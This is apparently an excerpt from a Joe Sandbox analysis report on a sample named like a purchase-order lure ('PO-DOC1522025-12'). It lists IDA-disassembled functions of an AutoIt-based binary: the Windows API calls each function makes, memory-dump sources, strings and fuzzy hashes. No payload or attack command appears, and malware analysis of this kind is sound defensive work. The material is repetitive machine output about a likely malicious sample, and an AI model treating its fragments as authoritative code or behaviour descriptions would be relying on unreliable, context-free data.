                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                    • String ID: STOP
                                                                                    • API String ID: 1256254125-2411985666
                                                                                    • Opcode ID: 5f16354008d6872efd7b86dfcd901fcb0f94952721a01eec0c2ab7f7917717ca
                                                                                    • Instruction ID: ac738b012c733a1938f1894a8e184de461aeac5aa144fce53687f49515b3278e
                                                                                    • Opcode Fuzzy Hash: 5f16354008d6872efd7b86dfcd901fcb0f94952721a01eec0c2ab7f7917717ca
                                                                                    • Instruction Fuzzy Hash: 230126366005278BCB209FFDDC808BF33B4EF727607050524E86297199EB31D900C650
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001A1D4C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 624084870-1403004172
                                                                                    • Opcode ID: f529ef740dfbd90e51977b1c0e9108468420e0394a838e0c2387384934a1af67
                                                                                    • Instruction ID: b1cfe0503431d914be9cd3e93c9451e1fb0bb360e159163f17a2cb7b1ab2e503
                                                                                    • Opcode Fuzzy Hash: f529ef740dfbd90e51977b1c0e9108468420e0394a838e0c2387384934a1af67
                                                                                    • Instruction Fuzzy Hash: 5001B579651229ABCB08EBA4DC559FF7768EB57350F040A1AB832572D2EB3059088660
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 001A1C46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 624084870-1403004172
                                                                                    • Opcode ID: 151c33a088377871b4eb2993a540d27ddc81879659272398aac08aedec0d0ba5
                                                                                    • Instruction ID: b3bf7d1e7e98e051b8a3d97d8da8d148f036717e3793c4cc7e78043f45ec7c27
                                                                                    • Opcode Fuzzy Hash: 151c33a088377871b4eb2993a540d27ddc81879659272398aac08aedec0d0ba5
                                                                                    • Instruction Fuzzy Hash: BE01A779AC121976CB08EBA0DD51AFF77A89F23350F14001AB416672D6EB209F18D6B1
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 001A1CC8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 624084870-1403004172
                                                                                    • Opcode ID: 142fca3b8cb6a71e0501406ec6a2c1259f491303b80e7ca4e9e10654f3c948ff
                                                                                    • Instruction ID: dd82e784be399194cb3ef58569e3fe09b4cb99fd543f99689da3b8eb43771f62
                                                                                    • Opcode Fuzzy Hash: 142fca3b8cb6a71e0501406ec6a2c1259f491303b80e7ca4e9e10654f3c948ff
                                                                                    • Instruction Fuzzy Hash: 6F01D679A8122977CF04EBA4DE41AFF77A89B23350F540016B80277296EB209F18D6B1
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA
                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 001A1DD3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 624084870-1403004172
                                                                                    • Opcode ID: 8778ed361a7279475d9722172aea8e37e90a6c4f9f93b15522cfd8f70114077b
                                                                                    • Instruction ID: 97fe115999870f4793239cf6e6f1c3195fb1748a057a8c9ea3247eef8b90e5b0
                                                                                    • Opcode Fuzzy Hash: 8778ed361a7279475d9722172aea8e37e90a6c4f9f93b15522cfd8f70114077b
                                                                                    • Instruction Fuzzy Hash: 38F02879B4122976DB08F7E4DC96FFF7778AF13350F040915B822672D2DB60590C86A0
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00213018,0021305C), ref: 001D81BF
                                                                                    • CloseHandle.KERNEL32 ref: 001D81D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID: \0!
                                                                                    • API String ID: 3712363035-164112491
                                                                                    • Opcode ID: e74e039740a4d91f20489b1c354c304c66225294e0d22c71fb63f5188a3d9d27
                                                                                    • Instruction ID: 9df83eb801d096974f8937d6466b1690e5375bb548a1a16386e61746f3f64d2b
                                                                                    • Opcode Fuzzy Hash: e74e039740a4d91f20489b1c354c304c66225294e0d22c71fb63f5188a3d9d27
                                                                                    • Instruction Fuzzy Hash: 1FF05EB2641300BEE620AB65AC49FF73ADDEB2C750F004421FB08D51A2DB758B5082F8
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: 3, 3, 16, 1
                                                                                    • API String ID: 176396367-3042988571
                                                                                    • Opcode ID: 9219cbad763a18f53fe582cf218f58476ee704bff2619c29a94df3e727192d1f
                                                                                    • Instruction ID: 31c8778d193ad774edceb5731ac2ba9c7f57cf9144b20c706d7cbf611cdeb6df
                                                                                    • Opcode Fuzzy Hash: 9219cbad763a18f53fe582cf218f58476ee704bff2619c29a94df3e727192d1f
                                                                                    • Instruction Fuzzy Hash: 27E02B0265472011A33512799CC1F7F568ADFF9750710182FF981C22E6EBD4CDA193A0
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001A0B23
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 2030045667-4017498283
                                                                                    • Opcode ID: 5ee5b7a3166391831e4c7b6626a9f4d3618484d16ec46632ab4e0d14b733d67f
                                                                                    • Instruction ID: 195a88de5975f8624879f2c016e132932459fc7a95a19e04891a9686813ee987
                                                                                    • Opcode Fuzzy Hash: 5ee5b7a3166391831e4c7b6626a9f4d3618484d16ec46632ab4e0d14b733d67f
                                                                                    • Instruction Fuzzy Hash: 02E0D83124531966D2143794BC03FC97B848F16B25F10082BFB58595C38BD224A086E9
                                                                                    APIs
                                                                                      • Part of subcall function 0015F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00160D71,?,?,?,0014100A), ref: 0015F7CE
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0014100A), ref: 00160D75
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0014100A), ref: 00160D84
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00160D7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 55579361-631824599
                                                                                    • Opcode ID: 78630259d3aad55394a1a5f2f66189c708c4b3af4a89876acaf4adf546276de6
                                                                                    • Instruction ID: 8b0d07bfc05fd925af3341857fdefebf93bd8972346b0c49060d384bd9a36091
                                                                                    • Opcode Fuzzy Hash: 78630259d3aad55394a1a5f2f66189c708c4b3af4a89876acaf4adf546276de6
                                                                                    • Instruction Fuzzy Hash: DAE06D742013018BD3219FB8E908342BBE5AB18745F018A2EE496C6B55DBB0E585CB91
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 0015E3D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: 0%!$8%!
                                                                                    • API String ID: 1385522511-1065198821
                                                                                    • Opcode ID: 837148ef5c32b636cf358924d3da68580e2fa536bc2938f4ddbf88812af61c96
                                                                                    • Instruction ID: c3f22c9e5228aa34614b65f391388ad547562bd53b1df859a7a6ad4caa45320a
                                                                                    • Opcode Fuzzy Hash: 837148ef5c32b636cf358924d3da68580e2fa536bc2938f4ddbf88812af61c96
                                                                                    • Instruction Fuzzy Hash: 24E02631C10910EBCA0D971CFBE8ACA33D7BB39321B904168F8228F1D1DF7029AD8644
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001B302F
                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001B3044
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: d8b45ffe04d28ffa3b87e8a504a23131f6e6b4ab44c5777c589b08136eef225f
                                                                                    • Instruction ID: 099ac8ea2b148826340cfc260353ff582d930e8149904b942d67048d3a9c6c08
                                                                                    • Opcode Fuzzy Hash: d8b45ffe04d28ffa3b87e8a504a23131f6e6b4ab44c5777c589b08136eef225f
                                                                                    • Instruction Fuzzy Hash: CBD05B7150131467DB20A7949C0DFC77B7CD705750F000652B655D24D1DAB09584CAD0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime
                                                                                    • String ID: %.3d$X64
                                                                                    • API String ID: 481472006-1077770165
                                                                                    • Opcode ID: 60798cbe7507f406b0a734a7a3379160fa831d857a87def05267856782d29101
                                                                                    • Instruction ID: 638605dd74c88080b8afcde245ab66bbefd96b768a5aed5b859270ef346d07ff
                                                                                    • Opcode Fuzzy Hash: 60798cbe7507f406b0a734a7a3379160fa831d857a87def05267856782d29101
                                                                                    • Instruction Fuzzy Hash: 09D01275C09109E9CF5897D0EC458BAB37CAB18341F518452FC1691080D724D548A761
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D232C
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001D233F
                                                                                      • Part of subcall function 001AE97B: Sleep.KERNEL32 ref: 001AE9F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 45a3655f77d9e994e6cdcbe92510fd0d71065c1ccd3c86e273eabaf9d636ce81
                                                                                    • Instruction ID: 1f5c3b3dfcdc74140179a91cb3c60adf7f460ca5ea7da740c5ba58013d3e8876
                                                                                    • Opcode Fuzzy Hash: 45a3655f77d9e994e6cdcbe92510fd0d71065c1ccd3c86e273eabaf9d636ce81
                                                                                    • Instruction Fuzzy Hash: 41D0C9363D6311B6EA64A770AC4FFC6BA589B11B14F004916B645AA1E1CAA0A851CA94
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D236C
                                                                                    • PostMessageW.USER32(00000000), ref: 001D2373
                                                                                      • Part of subcall function 001AE97B: Sleep.KERNEL32 ref: 001AE9F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: c442392a913a66af7c6099cd8c848a9489e3a1b71e291ebcf66852794659d983
                                                                                    • Instruction ID: 494339cda6569f6227e580b88a0df4951fc2fbf3fb72253d93059f796da22e0a
                                                                                    • Opcode Fuzzy Hash: c442392a913a66af7c6099cd8c848a9489e3a1b71e291ebcf66852794659d983
                                                                                    • Instruction Fuzzy Hash: 9FD0C9363D23117AEA64A770AC4FFC6B6589B15B14F004916B645AA1E1CAA0A851CA94
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0017BE93
                                                                                    • GetLastError.KERNEL32 ref: 0017BEA1
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0017BEFC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: 303318cdbe2b66eec5155b8228fe0044c01345c334aa273f5cea6e0204a6ec36
                                                                                    • Instruction ID: 2a964ca765100fa3481da81c94e315e0c6f2429af5da7a98ae48f07d58b389e9
                                                                                    • Opcode Fuzzy Hash: 303318cdbe2b66eec5155b8228fe0044c01345c334aa273f5cea6e0204a6ec36
                                                                                    • Instruction Fuzzy Hash: 9241F535609216AFCF258F64CCD4BBA7BB4EF45B20F25816AF95D972A1DB308C01CB60